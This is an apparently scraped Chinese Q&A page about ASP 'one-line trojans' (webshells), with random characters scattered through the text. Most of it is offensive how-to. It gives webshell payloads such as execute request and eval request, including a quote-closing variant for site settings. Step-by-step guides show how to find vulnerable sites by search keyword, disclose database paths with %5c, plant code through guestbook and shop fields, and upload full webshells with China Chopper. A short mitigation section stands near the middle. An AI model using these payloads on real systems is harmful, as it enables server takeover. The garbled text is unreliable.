導航:首頁 > 編程大全 > 資料庫一句話木馬

資料庫一句話木馬

發布時間:2023-03-26 18:59:35

A. 一句話木馬的使用方法

首先,找到資料庫是asp格式的網站,然後,以留言板,或者發表文章的方式燃虧吵,把皮侍一句話添加到asp資料庫,或者加進asp網頁.
記住!我們的目的是把一句話<%execute request(value)%>添加到資料庫,無論任空孫何方式!
然後打開客戶端(就是你電腦上面的那個htm文件),填上加入了一句話的asp文件,或者是asp網頁,然後進入此網站伺服器。

B. mysql資料庫中能插一句話木馬嘛

insert into 表名 values('木馬')

C. 什麼是一句話木馬

一句話木馬的使用

實例一:「一句話木馬」入侵「EASYNEWS新聞管理系統

「EASYNEWS新聞管理系統 v1.01 正式版」是在企業網站中非常常見的一套整站模版,在該網站系統的留言本組件中就存在著數據過濾不嚴漏洞,如果網站是默認路徑和默認文件名安裝的話,入侵者可以利用該漏洞直接上傳ASP木馬程序控制整個網站伺服器。

Step1 搜索入侵目標

使用了「EASYNEWS新聞管理系統 v1.01 正式版」的網站,在網站頁面的底部版權聲明處,往往會有關鍵字元為「www.****.COM 版權所有」。只要在GOOGLE或網路中以該字元串為關鍵詞進行搜索,就可以找到大量的入侵目標。

Step2 檢測入侵條件

在這里,我們以網站「http://www.****.com/news/index.htm」為例進行一次入侵檢測。「EASYNEWS新聞管理系統」網站的留言本資料庫文件默認是位於「\ebook\db\ebook.asp」,首先在瀏覽器地址欄中輸入「http://www.****.com/news/ebook/db/ebook.asp」,回車後在瀏覽虧拍世器頁面中將顯示訪問留言本資料庫文件的返回信息。如果在頁面中顯示亂碼,則說明該網站的留言本資料庫文件沒有改名,可以進行入侵。

Step3 在資料庫中插入ASP後門

前面提到了該新聞系統的留言本插件存在過濾不嚴,因此我們可以通過提交發言,在資料庫中插入「一句話木馬」服務端代碼

在瀏覽器中訪問「http://www.****.com/news/khly.htm」,打開提交留言頁面。在提交頁面中的「主頁」欄中,直接填寫「一句話木銷肢馬」服務端代碼,其它隨便填寫。確定後點擊「發表留言」按鈕,文章發表成功後,即可將「一句話木馬」服務端代碼插入到留言本資料庫中了。

Step4 連接後門上傳Webshell

由於留言本資料庫文件「ebook.asp」是一個ASP文件,所以我們插入到資料庫文件中的ASP語句將會被執行。將「一句話木馬」客戶端中的提交地址改為留言本資料庫文件地址,然後用瀏覽器打開客戶端,在上方的輸入框中輸入上傳ASP木馬的保存路徑,在下面的輸入框中可以粘貼入其它的ASP木馬代碼,這里選擇的是桂林老兵網站管理助手ASP代碼。點擊提交按鈕後,剛才粘貼的ASP木馬將被寫入到論壇伺服器中保存。

Step5 打開WEBSHELL

上傳的ASP木馬被保存到與資料庫文件同一WEB目錄下,文件名為「temp.asp」,因此我們在IE瀏覽器中打開頁面「http://www.****.com/news/ebook/db/temp.asp」,輸入默認的密碼「gxgl.com」,就可以看到一個WEBSHELL了。

在Webshell中可以上傳其它的文件或者安裝木馬後門、執行各種命令等,網站的伺服器已經掌握在我們的手中,可以為所欲為了。

實例二 「社區超市」入侵動網論壇

Step1 檢測入侵條件

以入侵論壇「http://www.****.com/」為例。首先在瀏覽器地址欄中輸入「http://www.****.com/data/shop.asp」,回車後在瀏覽器頁面中將顯示訪問"shop.asp"文件的返回信息。說明該論壇的社區超市資料庫文件沒有改名或刪除,可以進行入侵。

Step2 在資料庫中插入ASP後門

登錄論壇後,點擊頁面中的「娛樂」→「社區超市」,打開社區超市頁面。在該頁面中選擇商店申請,打開「商店申請入駐」頁面「http://www.****.com/z_shop_newshop.asp」,在頁面中填寫任意信息,注意在「商店招牌」欄中,添加剛才的ASP代碼"〈%execute request("l")%〉"。確定後點擊「申請」按鈕進行提交,即可將ASP代碼保存在資料庫文件中了。

後面的步驟就與上面介紹的一樣了,只需要用藍屏木馬連接資料庫文件「http://sdoygb.w2.****.net/data/shop.asp」,然後上傳WEBSHELL就可以控制論賀搭壇伺服器了。

實例三 「一句話木馬」入侵未知網站

從上面的兩個例子,我們可以看出利用「一句話木馬」入侵控制存在資料庫過濾不嚴漏洞的網站,成功的前提是一定要知道網站的資料庫地址。對於一些使用了未知網頁程序的網站,我們如何才能找到它的資料庫地址呢?這就要結合暴庫或者跨站之類的方法了,下面只是結合一個簡單的暴庫,介紹一下利用一句話木馬入侵未知網站的方法。

Step1 暴庫得到資料庫路徑

以「http://bbs.****.com」為例。在瀏覽器中打開「http://bbs.****.com/join/listall.asp?bid=2」,將地址欄中join後的/改為%5c,在提交後的返回返回信息中可以看到網站資料庫地址:「』d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp』」,資料庫文件名中加入了「#」符號,「#」符號在IE中執行時被解釋為中斷符,要訪問該資料庫文件則必須將「#」號變為「23%」才可以。因此資料庫文件的實際WEB地址為「http://bbs.****.com/join/admin/adshuilonG!%23).asp」

Step2 注冊網站,插入「一句話木馬」

由於資料庫文件是ASP文件格式的,滿足入侵條件,因此現在我們需要將「一句話木馬」插入到資料庫文件中去。

在網頁上點擊注冊網站按鈕,打開注冊鏈接「http://bbs.****.com/join/add.asp過濾了=step3&bid=3」,在資料填寫頁面處的站點名稱或地址中寫入「一句話木馬」服務端代碼,其它隨便填寫。然後點擊完成按鈕提交數據,木馬服務端就被插入到資料庫文件中了。

最後只需要用藍屏木馬連接資料庫文件「http://bbs.****.com/join/admin/adshuilonG!%23).asp」,然後上傳ASP木馬就可以控制該網站的伺服器了。

「一句話木馬」的防範

要防範「一句話木馬」可以從兩方面進行,首先是要隱藏網站的資料庫,不要讓攻擊者知道資料庫文件的鏈接地址。這就需要管理員在網頁程序中查被暴庫漏洞,在資料庫連接文件中加入容錯代碼等,具體的防暴庫方法在這里就不作過多的講解了。

其次就是要防止用戶提交的數據未過濾漏洞,對用戶提交的數據進行過濾,替換一些危險的代碼等。例如中國站長聯盟網站在出現該漏洞後已經對網頁程序進行的修補,插入的ASP代碼中的〈、〉和"等字元會被網頁程序轉換成其它字元,致使服務端代碼無法正常執行。

只要作好這兩方面的安全工作,「一句話木馬」雖然無孔不入,但是面對這樣的網站系統也是無可奈何的了。

D. 資料庫 mssql 已經插入一句話木馬,怎麼使用一句話傳木馬在線等。

一句話木馬的作用就是為了方便上傳大馬,直接上傳你的WEBSHELL

E. 一句話木馬的亂碼是怎麼得到的

這個其實還是利用的字元轉換,最早的時候禪塵是賣鍵直接輸入特殊字元的,後來各大數據庫都開始過濾他們了,就想到了這種方式
這個木馬其實沒啥可怕的,只要在伺服器上面安裝一個騰訊電腦管家
就賀配禪可以完美查殺的

F. 一句話木馬饒過過濾

不能繞過過濾的,因為這個技術是很老很老的技術了,我印象中這個一租唯句話木馬在六七年前就有了
現在的資料庫都已經過濾特殊字元了,所以這類的現在已經失效
退一步講,就算能過去,這么簡單的木馬代碼,也逃不過安軟的查殺的
只要對方的伺服器上面安裝有騰訊電腦管家這類的雲安軟,你轎型滾的木閉余馬沒有存活的可能性的

G. 一句話木馬怎麼插和我插了一句話木馬之後那個打開網址然後上傳代碼的網址是多少那些教程里沒有說那個地址

一句話木馬插入方法:第一種:先判斷資料庫是asp或其他格式,若為asp格式,可通過留言本向資料庫插入一句話代碼,插入後,用中國菜刀連接留言本資料庫地址(資料庫地址可以通過暴庫爆出路徑,暴不出路徑,就用工具強行掃描,看是否能掃到資料庫地址)就得到webshell了。第二種:進入網站後台,然後修改網站名,把網站名修改成一句話木馬代碼,記住,要閉合插入一句話,即

js">"%><%eval簡圓擾request("這里換成你喜歡設的密碼"%><%s="'閉合的一句話木馬代碼
<%evalrequest("這里換成你喜歡設的密碼"%>'未閉合的一句話木馬代碼

有一次,我進了一個網站後台,修改網站名時,沒有閉合插入一句話木馬代碼,致使後台出現了403錯誤,無法打開,白浪費了一個網站。閉合插入並保存後,用中國菜刀連接網站配置文件(配置文件路徑可以通過插入未閉合的一句話木馬代碼,不保存,點擊後台別的位置,會出現錯誤提示,下面的路徑就是網站配置文件的路徑),因為網站攔旦名等信息在網站的配置文件中,就要連接配置文件,成功後,你就得到了網站webshell了。

總之,我是這樣拿站的,希望這些方法對你腔沖有用。

H. 一句話木馬中的大馬和小馬的作用各是什麼

小馬體積衡裂小,容易隱藏,隱蔽性強,最重要在於與圖片結合一起上傳之後可以利用nginx或者IIS6的解析漏洞來運行,不過功能少,一般只有上傳等功能。
不過中國菜刀留的一句話功能不遜大馬的功能。

大馬體積比較大 一般50K以上。功能也多,咐耐閉一般都包括提權命令,磁碟管理,資料庫連接借口,執行命令甚至有些以具備自帶提權功能和壓縮,解壓縮網站程序畝毀的功能。這種馬隱蔽性不好,而大多代碼如不加密的話很多殺毒廠商開始追殺此類程序。

I. 超高分求 asp一句話木馬~

不知道你要的是不是這個
帖子名是一句話木馬精裝易用增強版本
http://bbs.hackbase.com/viewthread.php?tid=2780351&highlight=%D2%BB%BE%E4%BB%B0%2B%C4%BE%C2%ED

閱讀全文

與資料庫一句話木馬相關的資料

熱點內容
蘋果描述過期文件 瀏覽:271
當日沖賬密碼 瀏覽:691
u盤文件被吃掉了怎麼恢復 瀏覽:440
電腦游標總是打開同一個文件 瀏覽:178
數據刪除怎麼表示 瀏覽:672
蘋果用什麼清理緩存文件 瀏覽:248
數據科學之路是什麼 瀏覽:857
哪個app貸款好 瀏覽:826
iphone支持橋接嗎 瀏覽:16
dnf85版本首飾熟練度還有用么 瀏覽:201
commonconfigcfg配置文件 瀏覽:973
如何將wps文件拉入蘋果手機裡面 瀏覽:456
高中學什麼編程 瀏覽:342
迷你編程如何切換角色 瀏覽:737
魔術工具怎樣做 瀏覽:972
IDEA文件夾哪個是安裝包 瀏覽:864
wav格式的文件 瀏覽:489
iphone4s支持的視頻解析度 瀏覽:123
wps圖表鏈接文件不可用 瀏覽:426
官方網購節什麼網站 瀏覽:635

友情鏈接